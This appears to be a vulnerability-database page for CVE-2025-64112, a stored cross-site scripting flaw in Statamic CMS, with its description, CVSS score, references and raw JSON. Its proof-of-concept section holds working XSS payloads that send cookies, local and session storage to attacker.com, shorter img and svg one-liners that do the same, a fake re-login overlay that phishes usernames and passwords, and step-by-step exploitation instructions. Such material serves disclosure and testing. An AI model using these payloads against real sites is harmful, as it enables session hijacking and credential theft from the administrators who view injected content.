Security Vulnerability Report
CVE-2025-64112 CVSS 8.0 HIGH

CVE-2025-64112

Published: 2025-10-30 18:15:33
Last Modified: 2026-04-15 00:35:42

Description

Statamic is a Laravel and Git powered content management system (CMS). Stored XSS vulnerabilities in Collections and Taxonomies allow authenticated users with content creation permissions to inject malicious JavaScript that executes when viewed by higher-privileged users. This vulnerability is fixed in 5.22.1.

CVSS Details

CVSS Score
8.0
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Statamic CMS < 5.22.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
JavaScript
// CVE-2025-64112 Stored XSS PoC for Statamic CMS
// Target: Collections or Taxonomies fields
// Required: Authenticated user with content creation permissions

// Example malicious payload for XSS injection
// This payload can be injected into Collection/Taxonomy field names or values
const xssPayload = `
<script>
  // Cookie stealing payload
  fetch('https://attacker.com/steal?cookie=' + document.cookie);

  // Session hijacking
  const sessionData = {
    cookies: document.cookie,
    localStorage: localStorage,
    sessionStorage: sessionStorage,
    userAgent: navigator.userAgent
  };

  // Send stolen data to attacker server
  fetch('https://attacker.com/exfil', {
    method: 'POST',
    body: JSON.stringify(sessionData),
    headers: {'Content-Type': 'application/json'}
  });

  // DOM manipulation for phishing
  document.body.innerHTML += '<div style="position:fixed;top:0;left:0;width:100%;height:100%;background:white;z-index:9999;"><h1>Session Expired - Please Re-login</h1><form action="https://attacker.com/phish"><input name="username"><input name="password" type="password"><button>Submit</button></form></div>';
</script>
`;

// Alternative shorter payload examples:
// <img src=x onerror="fetch('https://attacker.com/?c='+document.cookie)">
// <svg/onload=fetch('https://attacker.com/?d='+btoa(document.domain))>
// <body onload="fetch('https://attacker.com/?s='+sessionStorage.getItem('token'))">

// Steps to exploit:
// 1. Authenticate to Statamic CMS with low-privilege account
// 2. Navigate to Collections or Taxonomies management
// 3. Create new Collection/Taxonomy or edit existing one
// 4. Inject XSS payload into field name or value
// 5. Save the content
// 6. Wait for admin/high-privilege user to view the content
// 7. XSS executes in victim's browser context

References

https://github.com/statamic/cms/commit/e513751f433679ce698606e20c554a0c839987c1
https://github.com/statamic/cms/security/advisories/GHSA-g59r-24g3-h7cm

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64112", "sourceIdentifier": "[email protected]", "published": "2025-10-30T18:15:33.183", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Statmatic is a Laravel and Git powered content management system (CMS). Stored XSS vulnerabilities in Collections and Taxonomies allow authenticated users with content creation permissions to inject malicious JavaScript that executes when viewed by higher-privileged users. This vulnerability is fixed in 5.22.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/statamic/cms/commit/e513751f433679ce698606e20c554a0c839987c1", "source": "[email protected]"}, {"url": "https://github.com/statamic/cms/security/advisories/GHSA-g59r-24g3-h7cm", "source": "[email protected]"}]}}